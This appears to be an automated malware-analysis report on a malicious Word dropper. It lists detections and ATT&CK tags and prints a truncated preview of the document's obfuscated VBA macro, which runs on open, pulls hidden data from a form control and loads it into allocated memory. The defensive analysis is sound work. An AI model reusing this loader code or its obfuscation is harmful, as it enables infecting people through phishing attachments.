MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6591342-0'. It contains a VBA macro, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The macro's intent is to download and execute a second-stage payload, as indicated by the heuristic firings and the nature of dropper malware.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6591342-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6591342-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4821 bytes |
SHA-256: affe4766f9ca40c27a4494be7e02388ecfe94ef5a2bdd017c2978f3e125ae4f9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim pokeweed As Integer
Dim capillament As String
Dim confined
Dim ensue
Dim anisogamic As Long
Dim buchloe
Dim averment
Function anointment(cities, righthander)
Dim passion As Variant
Dim aire As Long
capillament = "bewilderment"
Dim bever As Variant
Dim tenpin As Long
Dim aquifer As Integer
Dim mussel As String
Dim leveler As Long
kyles tenpin, ByVal VarPtr(righthander) + 8, 4
anisogamic = anisogamic - 453
leveler = cities
offer = 92
tyrannis = 51
If offer + tyrannis < 10 Then
offer = "di" & RightB$("penniastole", 6)
pokeweed = averment + 202
oversolicitous = "haem" & Mid("coniformoproteluggage", 9, 6) & LCase("IdAE")
Else
averment = pokeweed And 402
tyrannis = 41
End If
kyles ByVal leveler, ByVal tenpin, 48 + 3251
anisogamic = ensue And 294
End Function
Sub pageNumber()
ActiveDocument.Sections(ActiveDocument.Sections.Count) _
.Headers(wdHeaderFooterPrimary).Range.Select
With Selection
.Paragraphs(1).Alignment = wdAlignParagraphCenter
.TypeText Text:="Page "
.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"PAGE ", PreserveFormatting:=True
.TypeText Text:=" of "
.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"NUMPAGES ", PreserveFormatting:=True
End With
End Sub
Private Sub Document_Open()
Dim levee As Long
Dim acres As Long
razorback = "backhand"
bibliotist
For crosshead = 32 To 67
pinion = 67
capillament = "personification"
highspiritedness = "art" & Left("illerfrostbound", 5) & RightB$("azotemicy", 1)
highspiritedness = LCase("CO") & "ntemptibly"
Next crosshead
End Sub
Function monopolization(hoppedup)
serviceman = "falsehood"
samarkand = "analyze"
monopolization = RtlAllocateHeap(hoppedup, 0, 3299)
End Function
Sub bibliotist()
Dim brioche As Long
Dim whet As Integer
gavialidae = faithlessness.schismatically.ukraine.ControlTipText
geliebet = 4288
cubical = Right(gavialidae, geliebet)
litterer = accountable.animative(cubical)
imitative = 8
While imitative < 11
melosa = "simplified"
imitative = imitative + 1
ensue = averment * 1
Wend
attacking = "soimemefrench"
thyroidectomy = "carpe"
#If Win64 Then
Dim instructorship As Long
Dim marginality As delicatessen
Dim hausmannite As LongPtr
marginality.header = 0
Dim scombridae As Long
#Else
Dim anisotropic As Byte
marginality = 0
Dim spiel As Byte
Dim hausmannite As Long
#End If
footboy = 0
referable = "childhood"
ablutionary = 139 + 3957
simulium = 88
expulsion = 57
If simulium + expulsion < 31 Then
simulium = Mid("biotaxykibuilt", 8, 2) & RightB$("pelliculariadding", 5)
confined = "spinach"
batwing = Mid("moiderbrointerlocution", 7, 3) & Mid("homelyadloomawayness", 7, 6)
Else
buchloe = buchloe
expulsion = 65
End If
doublek = 177 + 261967
backlog = circumduction(doublek, marginality, marginality)
hausmannite = monopolization(backlog)
ample = LCase("pro") & Left("bantudrycleaned", 5) & LCase("r")
Dim bystander As String
charge = "command"
bystander = believe
cassino = 10
While cassino < 14
hic = "roisterer"
cassino = cassino + 1
capillament = "bondswoman"
Wend
aristotelean = litterer
nootka = "deciliter"
anointment hausmannite, aristotelean
pompom = LCase("dE") & RightB$("dodgefere", 4) & RightB$("mingnt", 2)
#If Win64 Then
Dim offset As Byte
iodocompound = "boletellus"
counteroffensive = "preraphaelite"
secretariat = "antifungal"
hevea = 36 + 540
#ElseIf (Win32) Then
ocarina = "contagiously"
readiness = "eurydice"
mariachi = "mullidae"
resonance = 479 + 27
hevea = resonance + 1698
#End If
Dim awlshaped As Long
Dim furnished As Variant
Dim pleasing As Long
pleasing = 0
Dim cnidaria As Long
cnidaria = hausmannite + hevea
annihilate
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.